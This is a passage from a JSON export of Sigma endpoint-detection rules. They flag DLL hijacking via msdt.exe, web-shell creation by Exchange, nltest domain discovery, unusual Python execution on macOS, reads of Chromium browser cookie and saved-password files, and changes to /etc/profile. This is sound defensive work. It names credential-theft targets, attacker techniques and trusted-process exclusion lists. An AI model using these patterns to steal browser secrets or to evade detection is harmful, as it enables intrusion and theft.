"content": "title: DLL Hijacking via msdt.exe\nid: d956a4b6-4d5e-445a-9d2e-65dfe014661d\ndescription: |\n Detects potential Windows DLL Hijacking via msdt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msdt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\Cabinet.dll'\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\duser.dll'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\propsys.dll'\n - '\\secur32.dll'\n - '\\SSPICLI.DLL'\n - '\\UxTheme.dll'\n - '\\wer.dll'\n - '\\windows.storage.dll'\n - '\\WINHTTP.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d956a4b6-4d5e-445a-9d2e-65dfe014661d",
"rule_name": "DLL Hijacking via msdt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msdt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d9906f4e-c385-493b-84e3-a7c1603d8f6c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092139Z",
"creation_date": "2026-03-23T11:45:34.092141Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092146Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_suspicious_aspx_creation_exchange.yml",
"content": "title: Suspicious File Created by Exchange Server\nid: d9906f4e-c385-493b-84e3-a7c1603d8f6c\ndescription: |\n Detects the creation of suspicious files by Exchange Server.\n Attackers may deploy web shells in default IIS folders to execute commands or as a persistence mechanism.\n It is recommended to investigate the content of the created file to determine its legitimacy.\nreferences:\n - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/07/22\nmodified: 2025/08/27\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection_file:\n Kind: 'create'\n Path|endswith:\n - '.aspx'\n - '.asp'\n - '.ashx'\n - '.asmx'\n - '.ascx'\n - '.asax'\n\n selection_app_exchange:\n - ProcessCommandLine|contains: 'exchange'\n ProcessName: 'w3wp.exe'\n - ProcessParentCommandLine|contains: 'exchange'\n ProcessParentName: 'w3wp.exe'\n - ProcessGrandparentCommandLine|contains: 'exchange'\n ProcessGrandparentName: 'w3wp.exe'\n\n condition: all of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d9906f4e-c385-493b-84e3-a7c1603d8f6c",
"rule_name": "Suspicious File Created by Exchange Server",
"rule_description": "Detects the creation of suspicious files by Exchange Server.\nAttackers may deploy web shells in default IIS folders to execute commands or as a persistence mechanism.\nIt is recommended to investigate the content of the created file to determine its legitimacy.\n",
"rule_creation_date": "2025-07-22",
"rule_modified_date": "2025-08-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d9a80782-290c-4936-a1a0-e2666950ae0a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083450Z",
"creation_date": "2026-03-23T11:45:34.083453Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083457Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/software/S0359/"
],
"name": "t1018_nltest_domain_discovery.yml",
"content": "title: Domain Controllers & Trust Discovered via nltest.exe\nid: d9a80782-290c-4936-a1a0-e2666950ae0a\ndescription: |\n Detects the execution of nltest.exe for domain controllers discovery.\n Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/software/S0359/\ndate: 2021/03/31\nmodified: 2025/04/29\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - attack.t1482\n - attack.s0359\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n #nltest /dclist\n #nltest /domain_trusts /all_trusts\n selection_bin:\n - Image|endswith: '\\nltest.exe'\n - OriginalFileName: 'nltestrk.exe'\n\n selection_cmd:\n CommandLine|contains:\n - '/dclist'\n - '/domain_trusts'\n - '/dsgetdc'\n - '/dnsgetdc'\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\Windows\\AdminArsenal\\PDQInventory-Scanner\\service-?\\exec\\PDQInventoryScanner.exe'\n - '?:\\Program Files (x86)\\Admin Arsenal\\PDQ Inventory Agent\\PDQInventoryScanner.exe'\n - '?:\\Program Files (x86)\\Schneider Electric\\Power Monitoring Expert\\system\\bin\\vista.exe'\n - '?:\\Program Files\\Silverfort\\Silverfort AD Adapter\\SilverfortController.exe'\n\n # https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/run-analyzer-windows\n exclusion_MDEClientAnalyzer:\n CommandLine|contains: '?:\\WINDOWS\\system32\\nltest.exe /dsgetdc:'\n ParentCommandLine|contains|all:\n - 'powershell.exe -ExecutionPolicy Bypass'\n - 'MDEClientAnalyzer.ps1'\n - '-outputDir'\n\n # As seen in GOAD lab - Exchange 2016 CU12\n exclusion_msexchange:\n CommandLine: 'nltest /dclist:'\n ParentCommandLine: 'cmd /c nltest /dclist:'\n GrandparentImage: '?:\\Program Files\\Microsoft\\Exchange Server\\V??\\Bin\\MSExchangeHMWorker.exe'\n\n exclusion_puppet:\n GrandparentImage: '?:\\Program Files\\Puppet Labs\\Puppet\\puppet\\bin\\ruby.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d9a80782-290c-4936-a1a0-e2666950ae0a",
"rule_name": "Domain Controllers & Trust Discovered via nltest.exe",
"rule_description": "Detects the execution of nltest.exe for domain controllers discovery.\nAdversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2021-03-31",
"rule_modified_date": "2025-04-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1482"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d9c1ee27-920d-4581-a82b-8b5a7408e7c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295222Z",
"creation_date": "2026-03-23T11:45:35.295225Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295232Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059/006/"
],
"name": "t1569_006_susp_python_execution_macos.yml",
"content": "title: Python Execution in an Uncommon Context\nid: d9c1ee27-920d-4581-a82b-8b5a7408e7c1\ndescription: |\n Detects the Python interpreter being executed by a process in an uncommon folder or by osascript.\n Attackers may use Python to conduct operations on a compromised host.\n It is recommended to check the children of the Python process and the activity of the parents for malicious behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1059/006/\ndate: 2024/07/22\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.006\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n ProcessName:\n - '/usr/bin/python*'\n - '/usr/local/bin/python*'\n ProcessSigned: 'true'\n ProcessParentImage|contains: '?'\n\n selection_susp_ancestors:\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes'\n # process\n - '/osascript'\n\n condition: selection and 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d9c1ee27-920d-4581-a82b-8b5a7408e7c1",
"rule_name": "Python Execution in an Uncommon Context",
"rule_description": "Detects the Python interpreter being executed by a process in an uncommon folder or by osascript.\nAttackers may use Python to conduct operations on a compromised host.\nIt is recommended to check the children of the Python process and the activity of the parents for malicious behavior.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d9c45e4b-3983-4cd8-ad63-2fb99dffdea9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620953Z",
"creation_date": "2026-03-23T11:45:34.620955Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620967Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1539/",
"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1552_004_read_chrome_browser_sensitive_files_macos.yml",
"content": "title: Suspicious Access to Chrome-based Browser Sensitive Files\nid: d9c45e4b-3983-4cd8-ad63-2fb99dffdea9\ndescription: |\n Detects a suspicious access to Chrome-based browser files that hold, for instance, cookies or users's saved passwords.\n Adversaries may steal web application cookies and credentials and use them to gain access to web applications or Internet services as an authenticated user.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1539/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/06/18\nmodified: 2026/02/09\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - attack.t1555.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Kind: 'read'\n Path|startswith:\n - '/Users/*/Library/Application Support/Google/Chrome/'\n - '/Users/*/Library/Application Support/BraveSoftware/Brave-Browser/'\n - '/Users/*/Library/Application Support/Microsoft Edge/'\n - '/Users/*/Library/Application Support/com.operasoftware.Opera/'\n - '/Users/*/Library/Application Support/com.operasoftware.OperaGX/'\n - '/Users/*/Library/Application Support/Vivaldi/*/'\n Path|endswith:\n - '/Cookies'\n - '/Login Data'\n - '/Web Data'\n - '/History'\n - '/Bookmarks'\n ProcessImage|contains: '?'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n# Common browser exclusion\n exclusion_chrome:\n - Image:\n - '/Applications/Google Chrome*.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Applications/Google Chrome*.app/Contents/MacOS/Google Chrome'\n - '/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Volumes/Google Chrome/Google Chrome.app/Contents/MacOS/Google Chrome'\n - '/Users/*/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Users/*/Google Chrome.app/Contents/MacOS/Google Chrome'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'com.google.Chrome'\n - 'com.google.Chrome.helper'\n\n exclusion_edge:\n - Image:\n - '/Applications/Microsoft Edge.app/Contents/MacOS/Microsoft Edge'\n - '/Applications/Microsoft Edge.app/Contents/Frameworks/Microsoft Edge Framework.framework/Versions/*/Helpers/Microsoft Edge Helper.app/Contents/MacOS/Microsoft Edge Helper'\n - '/Applications/Microsoft Edge.app/Contents/Frameworks/Microsoft Edge Framework.framework/Versions/*/Helpers/Microsoft Edge Helper (Plugin).app/Contents/MacOS/Microsoft Edge Helper (Plugin)'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'com.microsoft.edgemac.helper.plugin'\n - 'com.microsoft.edgemac.helper'\n - 'com.microsoft.edgemac'\n\n exclusion_firefox:\n Image:\n - '*/Firefox*.app/Contents/MacOS/firefox'\n - '*/Firefox*.app/Contents/MacOS/pingsender'\n - '*/Firefox*.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container'\n - '*/Firefox*.app/Contents/MacOS/media-plugin-helper.app/Contents/MacOS/Firefox Media Plugin Helper'\n\n exclusion_safari:\n Image:\n - '/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.BrowserDataImportingService.xpc/Contents/MacOS/com.apple.Safari.BrowserDataImportingService'\n - '/System/Volumes/Preboot/Cryptexes/App/System/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.BrowserDataImportingService.xpc/Contents/MacOS/com.apple.Safari.BrowserDataImportingService'\n\n exclusion_arc:\n - Image:\n - '/Applications/Arc.app/Contents/MacOS/Arc'\n - '/Applications/Arc.app/Contents/Frameworks/ArcCore.framework/Versions/A/Helpers/Arc Helper.app/Contents/MacOS/Arc Helper'\n - '/Volumes/Arc/Arc.app/Contents/MacOS/Arc'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'company.thebrowser.Browser'\n\n exclusion_brave:\n - Image:\n - '/Applications/Brave Browser.app/Contents/MacOS/Brave Browser'\n - '/Applications/Brave Browser.app/Contents/Frameworks/Brave Browser Framework.framework/Versions/*/Helpers/Brave Browser Helper.app/Contents/MacOS/Brave Browser Helper'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.brave.Browser*'\n\n exclusion_opera:\n - Image:\n - '/Applications/Opera.app/Contents/Frameworks/Opera Framework.framework/Versions/*/Helpers/Opera Helper.app/Contents/MacOS/Opera Helper'\n - '/Applications/Opera.app/Contents/MacOS/Opera'\n - '/Users/*/Applications/Opera.app/Contents/MacOS/Opera'\n - '/Users/*/Applications/Opera.app/Contents/Frameworks/Opera Framework.framework/Versions/*/Helpers/Opera Helper.app/Contents/MacOS/Opera Helper'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.operasoftware.OperaGX'\n\n exclusion_vivaldi:\n - Image:\n - '/Applications/Vivaldi.app/Contents/MacOS/Vivaldi'\n - '/Applications/Vivaldi.app/Contents/Frameworks/Vivaldi Framework.framework/Versions/*/Helpers/Vivaldi Helper.app/Contents/MacOS/Vivaldi Helper'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'com.vivaldi.Vivaldi'\n - 'com.vivaldi.Vivaldi.helper'\n\n exclusion_waterfox:\n Image: '/Applications/Waterfox.app/Contents/MacOS/waterfox'\n\n exclusion_burp:\n Image: '/usr/local/bin/burp'\n# end common browser exclusion\n\n exclusion_haxm:\n Image: /usr/local/haxm/*/haxm'\n\n exclusion_paloalto:\n Image: '/library/application support/paloaltonetworks/traps/bin/pmd'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'pmd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_zen_browser:\n ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'org.mozilla.com.zen.browser'\n - 'app.zen-browser.zen'\n\n exclusion_birdagent:\n ProcessImage|endswith: '/bird_agent_stable'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: '_bird_python_dbg'\n\n exclusion_jetbrains:\n ProcessSigned: 'true'\n ProcessSignatureSigningId|startswith: 'com.jetbrains.'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_zotero:\n ProcessImage: '/Applications/Zotero.app/Contents/MacOS/zotero'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'org.zotero.zotero'\n\n exclusion_alfred:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.runningwithcrayons.Alfred'\n\n exclusion_norton:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.norton'\n\n exclusion_antigravity:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.google.antigravity.helper'\n\n exclusion_cursor:\n Image: '/Applications/Cursor.app/Contents/Frameworks/Cursor Helper.app/Contents/MacOS/Cursor Helper'\n\n exclusion_chatgpt:\n Image: '/Applications/ChatGPT Atlas.app/Contents/MacOS/ChatGPT Atlas'\n\n exclusion_claude:\n Image|endswith: '/lib/node_modules/@anthropic-ai/claude-code/vendor/ripgrep/arm64-darwin/rg'\n\n exclusion_comet:\n Image: '/Applications/Comet.app/Contents/MacOS/Comet'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'ai.perplexity.comet'\n\n exclusion_memory_cleaner:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.nektony.Memory-Cleaner-SIII'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d9c45e4b-3983-4cd8-ad63-2fb99dffdea9",
"rule_name": "Suspicious Access to Chrome-based Browser Sensitive Files",
"rule_description": "Detects a suspicious access to Chrome-based browser files that hold, for instance, cookies or users's saved passwords.\nAdversaries may steal web application cookies and credentials and use them to gain access to web applications or Internet services as an authenticated user.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-02-09",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d9f55b9d-87ee-4d92-ba79-5004d14af637",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.629504Z",
"creation_date": "2026-03-23T11:45:34.596785Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596792Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1546/004/"
],
"name": "t1546_004_system_profile_modified_linux.yml",
"content": "title: System Profile Modified\nid: d9f55b9d-87ee-4d92-ba79-5004d14af637\ndescription: |\n Detects an attempt to modify the system profile script (/etc/profile) and scripts in the /etc/profile.d/ directory.\n These scripts contain Linux system-wide environment and startup programs.\n Adversaries can establish persistence by adding a malicious binary path or shell commands to these files.\n It is recommended to investigate the process that read the file for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1546/004/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/etc/profile'\n - '/etc/profile.d/*'\n - TargetPath:\n - '/etc/profile'\n - '/etc/profile.d/*'\n\n filter_read:\n Kind: 'access'\n Permissions: 'read'\n\n filter_misc:\n Kind:\n - 'remove'\n - 'chmod'\n - 'chown'\n\n exclusion_common:\n ProcessImage:\n - '/usr/bin/tar'\n - '/usr/bin/coreutils'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - 